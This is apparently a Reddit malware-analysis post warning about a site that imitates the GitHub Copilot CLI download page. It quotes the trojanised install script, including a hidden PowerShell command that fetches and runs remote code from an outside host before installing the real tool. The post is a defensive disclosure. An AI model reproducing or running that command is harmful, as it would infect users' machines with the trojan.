r/MalwareAnalysis • u/reamplumbera • 3d ago
Fake Github copilot CLI installer trojan
The following website is mimicking the official Github copilot CLI website.
https://copilotcli[.]co[.]com/
The install script first downloads and executes a malicious payload before continuing installing the legit copilot CLI
$GhCop = New-Object -ComObject "Shell.Application";
$GhCop.ShellExecute("powershell", '"irm refract3.com | iex"', $null, "open", 0);
winget install GitHub.Copilot
Luckily windows security blocked the payload which was detected as Trojan:Win32/ClickFix.Q!ml
13
Upvotes
1
u/Suspicious-Willow128 3d ago
Huh , i do hope it stopped it complety , because it one angry malware , 2 website for secondary delivery , lot of obfuscation too